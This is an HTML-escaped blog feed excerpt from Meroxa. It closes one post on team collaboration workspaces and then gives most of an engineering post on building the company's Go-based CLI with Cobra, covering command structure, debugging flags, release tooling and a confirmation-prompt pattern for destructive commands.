&lt;p&gt;&lt;img src=&quot;https://lh4.googleusercontent.com/iyoItjlYk4iZlNF-5v10GJmc7rNMk5XV3U4cGiXYKME0m3ICFjLtDiZ0-nKXCReAu4QP_ATECTMTYyb21kWXmhIERIsIOVjSvPVKq-82jMcsAzBbua4R8wG5MqkMKRXQ9RcfADGWpkMd2IaMp4_-EHJqrwdL_zYRBDJUUYbKebmbt_FyBFiU9Sd-8w&quot; alt=&quot;terminal screenshot&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Working Together&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Once a user has accepted an invite to join a collaboration workspace, they can begin collaborating in the account. At this time, all users in the account will have the same level of access across resources, applications, and settings.&lt;/p&gt;
&lt;p&gt;Resources&lt;/p&gt;
&lt;p&gt;Check out our &lt;a href=&quot;https://docs.meroxa.com/&quot;&gt;Resources Guide&lt;/a&gt; to learn more about available source and destination resources and how to use them in Turbine applications. You can add resources via the dashboard or the CLI. All users in the account will be able to add, edit, access, and remove resources available in the account.&lt;/p&gt;
&lt;p&gt;Applications&lt;/p&gt;
&lt;p&gt;Check out our &lt;a href=&quot;https://docs.meroxa.com/turbine/get-started&quot;&gt;Getting Started with Turbine Guide&lt;/a&gt; to learn more about how to initialize, develop, deploy, and release a data application using our application framework. You can initialize and deploy applications via the CLI. Meroxa scaffolds a codebase in an empty Git repository when you initialize a Turbine application where you can develop your application. However, we encourage teams to collaborate on their application code in a shared Github repository accessible to your team. Through the shared repository you can track, commit, clone code accessible to your team and deploy an application in Meroxa using our CLI within minutes.&lt;/p&gt;
&lt;p&gt;Once an application is deployed, everyone in the account will be able to view and manage that application. All users in the account can add applications, view applications deployed in the account and remove existing applications.&lt;/p&gt;
&lt;p&gt;Settings&lt;/p&gt;
&lt;p&gt;All users in the account will be able to access and edit the Account settings which includes the Account, Users, and Billing tabs. To access those tabs, click on your profile icon and select Account settings.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Have questions or feedback?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;We are excited to take this initial step into Collaboration and will continue to build out features to enable a collaborative real-time code-first stream processing application code-first data application platform for developers. If you have questions or feedback, reach out directly by&lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;joining our community&lt;/a&gt; or by writing to &lt;a href=&quot;mailto:support@meroxa.com&quot;&gt;support@meroxa.com&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;We can’t wait to see what you and your team build! 🚀&lt;/strong&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[How We Built our Meroxa CLI]]></title><description><![CDATA[Building and maintaining a CLI is a daunting task if you don’t have some guidance along the way. We identified some best practices to help you.]]></description><link>https://meroxa.com/blog/how-we-built-our-meroxa-cli</link><guid isPermaLink="false">https://meroxa.com/blog/how-we-built-our-meroxa-cli</guid><dc:creator><![CDATA[Raúl Barroso]]></dc:creator><pubDate>Tue, 11 Oct 2022 16:54:21 GMT</pubDate><content:encoded>&lt;p&gt;Building a Command Line Interface (CLI) is as intimidating as trying to draw a painting in front of a blank canvas. You can feel inspired by the ones that resonate with your desired user experience, but ultimately you need to figure out some important things on your own along the way.&lt;/p&gt;
&lt;p&gt;In this blog post, based on our own experience building the &lt;a href=&quot;https://github.com/meroxa/cli&quot;&gt;Meroxa CLI&lt;/a&gt;, I’ll guide you through some important aspects to consider when either architecting a CLI from scratch or maintaining an existing one.&lt;/p&gt;
&lt;h2&gt;Why build a Command Line Interface&lt;/h2&gt;
&lt;p&gt;Our mission at Meroxa is enabling engineers to build applications with real-time data while automating repetitive operations. Although we also offer a &lt;a href=&quot;https://dashboard.meroxa.io&quot;&gt;visual interface&lt;/a&gt;, we knew that by offering a CLI we were empowering engineers to &lt;strong&gt;stay in workflow.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;By having a Command Line Interface as part of our product line-up we’ve given our customers the ability to automate their use of our platform since the beginning while also providing a user interoperability that feels natural and intuitive. The best of both worlds.&lt;/p&gt;
&lt;h2&gt;Starting a CLI&lt;/h2&gt;
&lt;p&gt;Let’s start with the simplest scenario, where you get to answer the most immediate and common questions:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;What language will it be based on?&lt;/li&gt;
&lt;li&gt;Is there an existing framework that will make my life easier as a developer?&lt;/li&gt;
&lt;li&gt;Can I leverage existing tooling or solutions for the releasing process?&lt;/li&gt;
&lt;li&gt;How should I structure the syntax of my CLI? “noun verb” or “verb noun” 🥫🪱&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Language, framework, and tooling trifecta.&lt;/h3&gt;
&lt;p&gt;Your language of choice should be based on aspects as simple as what language you know, who you expect will contribute, and how you expect your CLI will be distributed. All these factors were easy to answer at Meroxa, considering the majority of our expertise has been embodied in services written in Go, and this language shines when it comes to portability across different operating systems.&lt;/p&gt;
&lt;p&gt;Like with any other development product you are building, a framework comes in handy so you can focus on developing new features and not so much on repeating yourself with things that are not part of your core business. For CLIs written in Go, &lt;a href=&quot;https://github.com/spf13/cobra&quot;&gt;Cobra’s framework&lt;/a&gt; is the standard. It’s widely used by many &lt;a href=&quot;https://github.com/spf13/cobra/blob/main/projects_using_cobra.md&quot;&gt;developer tools&lt;/a&gt; and provides a variety of features that we knew we needed, so this seemed like a reasonable decision. On top of it, the appearance of many development tools are starting to elevate the CLI experience to another level (e.g. &lt;a href=&quot;https://charm.sh/&quot;&gt;Charm’s tools&lt;/a&gt;), so continuing with the decision of using Go for our CLI seemed like a no-brainer.&lt;/p&gt;
&lt;p&gt;Frameworks are not the only type of tooling that is important to consider in the development of your CLI. To make it accessible to others, choosing what tool to use for releasing could affect your focus substantially. Letting distribution to be managed with automated tools such as &lt;a href=&quot;https://goreleaser.com/&quot;&gt;GoReleaser&lt;/a&gt; with &lt;a href=&quot;https://goreleaser.com/customization/homebrew/&quot;&gt;Homebrew&lt;/a&gt; are a match made in heaven, allowing you to leverage GitHub actions to release new versions of your &lt;a href=&quot;https://github.com/meroxa/homebrew-taps/blob/master/Formula/meroxa.rb&quot;&gt;Homebrew formula&lt;/a&gt; every time a new tag is created. More about this topic below.&lt;/p&gt;
&lt;h3&gt;“noun verb”, “verb noun”, or how to make someone unhappy&lt;/h3&gt;
&lt;p&gt;Here comes the time to decide in which color you’ll paint your &lt;a href=&quot;https://en.wikipedia.org/wiki/Law_of_triviality&quot;&gt;bikeshed&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;At the time of structuring your CLI commands, you’ll hear arguments for whether you should use the “noun verb” form (e.g. &lt;code class=&quot;language-text&quot;&gt;meroxa resources list&lt;/code&gt;) or the one with “verb noun” instead (e.g.: &lt;code class=&quot;language-text&quot;&gt;meroxa list resources&lt;/code&gt;). This is probably a debate that will last until something like a search ahead autocomplete type of tool is in place on every CLI terminal out there. There’s no clear winner.&lt;/p&gt;
&lt;p&gt;The first aspect we considered at the time of making a decision was by looking at how other CLIs that our customers could be using were structured. If our CLI users were accustomed to using a tool with a specific design, &lt;a href=&quot;https://kubernetes.io/docs/reference/kubectl/&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;kubectl&lt;/code&gt;&lt;/a&gt; for example, which uses “verb noun”, we thought it made sense to go in that direction. The intention was to reduce friction between the two, and let users transition from one tool to another without too much overhead. We started with this approach when we bootstrapped our CLI, and we used this design for a few months.&lt;/p&gt;
&lt;p&gt;Guess what we ended up doing. We decided to change it to “noun verb”. The reason was that since there wasn’t such a standard as “noun verb” vs “verb noun” across the community, we could always find other tools that would be a counterargument to our first decision. We had to keep digging on what direction we ultimately had to take, and our conclusion was that as humans, we tend to think on what is the thing we want to operate on &lt;strong&gt;first&lt;/strong&gt;, and then what we can do with it &lt;strong&gt;after&lt;/strong&gt;. We also considered that the form “noun verb” could also be beneficial for discovery purposes. At the time of running &lt;code class=&quot;language-text&quot;&gt;meroxa help&lt;/code&gt;, this command currently lists the main “things” you can interact with in our platform (apps, resources, etc). We found that having actions listed instead such as run, list, create, etc… wasn’t that helpful unless you were already familiar with all the features our Meroxa Platform provides.&lt;/p&gt;
&lt;h3&gt;Before Releasing&lt;/h3&gt;
&lt;p&gt;Before you take the step of sharing your CLI with other people, there are questions you should ask yourself. Prioritize accordingly before they become problematic for your development productivity.&lt;/p&gt;
&lt;p&gt;The fact that you won’t know in what environments your users will run your CLI means that before going wild and sharing it with the world, spend a bit of time including features that will help you understand how to fix those previously released CLI bugs. Again, what we’re aiming for here is for you, as a developer, to spend as much time as possible developing new features (or fixing bugs) rather than having to go back and forth between your customers asking for more information so you can finally fix the issue.&lt;/p&gt;
&lt;p&gt;The most important aspect is that for every CLI issue your customer finds, you should be able to respond with a specific command that once executed should give you some insight on what’s happening.&lt;/p&gt;
&lt;p&gt;Here are some things we prioritized early in the development process:&lt;/p&gt;
&lt;h4&gt;Knowing your version&lt;/h4&gt;
&lt;p&gt;The most important command after &lt;code class=&quot;language-text&quot;&gt;help&lt;/code&gt; is &lt;code class=&quot;language-text&quot;&gt;version&lt;/code&gt;. This command should indicate exactly what CLI version your customers are running. When a customer reports an issue, you need to verify what version they’re on so you can identify whether that issue they’re reporting was already fixed and they only need to upgrade, or if in fact it’s a new issue you need to take care of.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Example:&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell&quot;&gt;&lt;pre class=&quot;language-shell&quot;&gt;&lt;code class=&quot;language-shell&quot;&gt;
$ meroxa version
meroxa/2.8.1 darwin/amd64&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Later in the process we noticed we also needed to be more specific for those advanced users that weren’t using an upstream version of the CLI, but rather if they had built the binary locally. For that reason, we included a &lt;code class=&quot;language-text&quot;&gt;dev&lt;/code&gt; indication as part of the version, the &lt;code class=&quot;language-text&quot;&gt;git commit sha&lt;/code&gt; they were running, and the closest &lt;code class=&quot;language-text&quot;&gt;git tag&lt;/code&gt; its commit was associated with.&lt;/p&gt;
&lt;p&gt;For those adventurous users who had modified the code locally, &lt;code class=&quot;language-text&quot;&gt;meroxa version&lt;/code&gt; would include &lt;code class=&quot;language-text&quot;&gt;(updated)&lt;/code&gt; to tell us this was the case. Here’s a &lt;a href=&quot;https://docs.meroxa.com/changelog/2022-05-04-meroxa-cli-v-2-0-2&quot;&gt;changelog&lt;/a&gt; we published announcing this change.&lt;/p&gt;
&lt;h4&gt;Showing API headers and stack trace&lt;/h4&gt;
&lt;p&gt;Another very common issue I often see on other CLIs is their code not dealing with API errors correctly. For example, a customer runs a command and returns a very generic error message, or not error at all. That’s not very helpful, is it?&lt;/p&gt;
&lt;p&gt;Ideally, you should be able to ask your customer to run the same command they did before, but with some special flag or header instead that could include the entire trace of your command and then give you the exact information you’re looking for.&lt;/p&gt;
&lt;p&gt;This command, in addition to the expected output, should return things such as:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;What API endpoints this command called with its HTTP headers.&lt;/li&gt;
&lt;li&gt;Their actual API responses as they happened including response HTTP headers.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;At Meroxa, we offered two options to accomplish this:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Setting a &lt;code class=&quot;language-text&quot;&gt;MEROXA_DEBUG&lt;/code&gt; environment variable. (e.g.: &lt;code class=&quot;language-text&quot;&gt;MEROXA_DEBUG=1 meroxa resources ls&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Providing a &lt;code class=&quot;language-text&quot;&gt;--debug&lt;/code&gt; flag (e.g.: &lt;code class=&quot;language-text&quot;&gt;meroxa resources ls --debug&lt;/code&gt;)&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The benefit of using an environment variable is that you could easily set this so it works with &lt;strong&gt;all&lt;/strong&gt; your commands. The second option should be documented via &lt;code class=&quot;language-text&quot;&gt;meroxa help&lt;/code&gt;, and it’s more suitable for one-off attempts when something goes wrong.&lt;/p&gt;
&lt;p&gt;As part of this, you should also bear in mind that users will likely copy the entire stack trace and send it to you. To make this more secure, consider obfuscating your user’s access token: &lt;code class=&quot;language-text&quot;&gt;Authorization: Bearer eyAtIe...FHtiNTA&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Otherwise, these could easily end up in some chat, email, or support tool when in fact these should only belong to your customer.&lt;/p&gt;
&lt;h4&gt;Logged in user&lt;/h4&gt;
&lt;p&gt;Different users could have different behaviours, so an easy checkpoint you should have around your logged in users is being able to precisely identify what account they’re using. Something like this is sufficient:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell&quot;&gt;&lt;pre class=&quot;language-shell&quot;&gt;&lt;code class=&quot;language-shell&quot;&gt;
$ meroxa &lt;span class=&quot;token function&quot;&gt;whoami&lt;/span&gt;
raul@meroxa.io&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h4&gt;Automated testing&lt;/h4&gt;
&lt;p&gt;For every pull-request we try to merge in our main branch of our CLI repository, we run a sequence of tests to ensure an expected output based on the provided input.&lt;/p&gt;
&lt;p&gt;In order to make our CLI compatible with automated testing we needed to make scripting possible with things such as:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Providing a &lt;code class=&quot;language-text&quot;&gt;--json&lt;/code&gt; flag&lt;/strong&gt; to all commands so we could check for specific deterministic results and instead not compare with string outputs that could easily change and break our automation scripts.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Being able to execute a command with no prompts.&lt;/strong&gt; We have some commands where customers are expected to provide some required information so the CLI can carry on with its execution. We needed to be able to accomplish the same without any user input. Let’s take removing an artifact as an example which usually requires confirmation as it’s a destructive action. At Meroxa, you’d use &lt;code class=&quot;language-text&quot;&gt;--force&lt;/code&gt; with the value to confirm. e.g.: &lt;code class=&quot;language-text&quot;&gt;meroxa resources rm my-resource --force my-resource&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Being able to have different configuration files&lt;/strong&gt;. This one is highly dependent on what kind of CLI you’re developing, but in our case, we wanted to make sure our CLI was operating correctly in different environments, and an easy way to configure that is by using a configuration file. Something users could do, such as &lt;code class=&quot;language-text&quot;&gt;meroxa resources ls --config PATH_OF_ANOTHER_CONFIG_FILE&lt;/code&gt; which should contain all the configuration that makes your CLI operate with another environment very easily.&lt;/li&gt;
&lt;/ol&gt;
&lt;h4&gt;Ready to release&lt;/h4&gt;
&lt;p&gt;Once you have put together a bare minimum set of features that you think will make your life as a developer not too complicated, it’s releasing time.&lt;/p&gt;
&lt;p&gt;To distribute our CLI, we decided to start using an industry standard such as &lt;a href=&quot;https://brew.sh&quot;&gt;Homebrew&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Like I mentioned before, considering our CLI was written in Go, using the fantastic tool &lt;a href=&quot;https://goreleaser.com/&quot;&gt;GoReleaser&lt;/a&gt; made perfect sense. This one includes a way to automatically generate a &lt;a href=&quot;https://goreleaser.com/customization/homebrew/&quot;&gt;Homebrew Tap&lt;/a&gt; so with every tag that’s created in our CLI repository, a &lt;a href=&quot;https://github.com/meroxa/cli/blob/master/.github/workflows/release.yml&quot;&gt;GitHub action&lt;/a&gt; creates a new version of our &lt;a href=&quot;https://github.com/meroxa/homebrew-taps/blob/master/Formula/meroxa.rb&quot;&gt;HomeBrew formula&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;Maintaining a CLI&lt;/h2&gt;
&lt;p&gt;At this point, we were able to ship a first iteration of our CLI so users could download it with certain confidence. Now, I’ll mention the other things we prioritized that weren’t necessarily our main product features.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Collaboration&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Being a sole developer can only get you that far. It was certainly time to invest to make our code ready for contributions. This is especially important if you’re working in the open (source). &lt;a href=&quot;https://opensource.guide/starting-a-project/#launching-your-own-open-source-project&quot;&gt;Here’s some guidance&lt;/a&gt; I would consider relevant.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Get creative, CLI builder&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;At Meroxa, we decided that while Cobra’s set of features was great to start with, we considered that CLI composition could be improved to our own benefit.&lt;/p&gt;
&lt;p&gt;If we wanted to replicate behaviour across certain types of commands, while maintaining the same user experience across them regardless of our own developer’s awareness of these, we would need a way of building commands based on the desired behaviour of each command. Something declarative and easily tested.&lt;/p&gt;
&lt;p&gt;For example, on root (&lt;code class=&quot;language-text&quot;&gt;meroxa&lt;/code&gt;), every subcommand is added &lt;a href=&quot;https://github.com/meroxa/cli/blob/master/cmd/meroxa/root/root.go#L84-L103&quot;&gt;like this&lt;/a&gt;, which uses this function to &lt;a href=&quot;https://github.com/meroxa/cli/blob/master/cmd/meroxa/root/root.go#L59&quot;&gt;return a Cobra Command interface&lt;/a&gt; type, based on the methods that it implements.&lt;/p&gt;
&lt;p&gt;For instance, when creating a new command, we would define what methods it needs to implement like this:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;
&lt;span class=&quot;token keyword&quot;&gt;var&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
	&lt;span class=&quot;token boolean&quot;&gt;_&lt;/span&gt; builder&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;CommandWithDocs             &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;*&lt;/span&gt;Remove&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	&lt;span class=&quot;token boolean&quot;&gt;_&lt;/span&gt; builder&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;CommandWithAliases          &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;*&lt;/span&gt;Remove&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	&lt;span class=&quot;token boolean&quot;&gt;_&lt;/span&gt; builder&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;CommandWithArgs             &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;*&lt;/span&gt;Remove&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	&lt;span class=&quot;token boolean&quot;&gt;_&lt;/span&gt; builder&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;CommandWithClient           &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;*&lt;/span&gt;Remove&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	&lt;span class=&quot;token boolean&quot;&gt;_&lt;/span&gt; builder&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;CommandWithLogger           &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;*&lt;/span&gt;Remove&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	&lt;span class=&quot;token boolean&quot;&gt;_&lt;/span&gt; builder&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;CommandWithExecute          &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;*&lt;/span&gt;Remove&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	&lt;span class=&quot;token boolean&quot;&gt;_&lt;/span&gt; builder&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;CommandWithConfirmWithValue &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;*&lt;/span&gt;Remove&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This way, it forces the developer to implement any method that&apos;s required for each of its interfaces.&lt;/p&gt;
&lt;p&gt;As an example, the following interface is added for every destructive command:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;
&lt;span class=&quot;token keyword&quot;&gt;type&lt;/span&gt; CommandWithConfirmWithValue &lt;span class=&quot;token keyword&quot;&gt;interface&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	Command
	&lt;span class=&quot;token comment&quot;&gt;// ValueToConfirm adds a prompt before the command is executed where the user is asked to write the exact value as&lt;/span&gt;
	&lt;span class=&quot;token comment&quot;&gt;// wantInput. If the user input matches the command will be executed, otherwise processing will be stopped.&lt;/span&gt;
	&lt;span class=&quot;token function&quot;&gt;ValueToConfirm&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;ctx context&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Context&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;wantInput &lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;What this gives us is a command that, before executing, prompts you to input a specific value:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;
&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;buildCommandWithConfirmWithValue&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;cmd &lt;span class=&quot;token operator&quot;&gt;*&lt;/span&gt;cobra&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Command&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; c Command&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	v&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; ok &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; c&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;CommandWithConfirmWithValue&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;!&lt;/span&gt;ok &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt;
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

	&lt;span class=&quot;token keyword&quot;&gt;var&lt;/span&gt; force &lt;span class=&quot;token builtin&quot;&gt;bool&lt;/span&gt;

	cmd&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Flags&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;BoolVarP&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;amp;&lt;/span&gt;force&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;force&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;f&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;false&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;skip confirmation&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

	old &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; cmd&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;RunE
	cmd&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;RunE &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;cmd &lt;span class=&quot;token operator&quot;&gt;*&lt;/span&gt;cobra&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Command&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; args &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;error&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; old &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
			err &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;old&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;cmd&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; args&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
			&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
				&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; err
			&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
		&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

		&lt;span class=&quot;token comment&quot;&gt;// do not prompt for confirmation when --force is set&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; force &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
			&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;
		&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

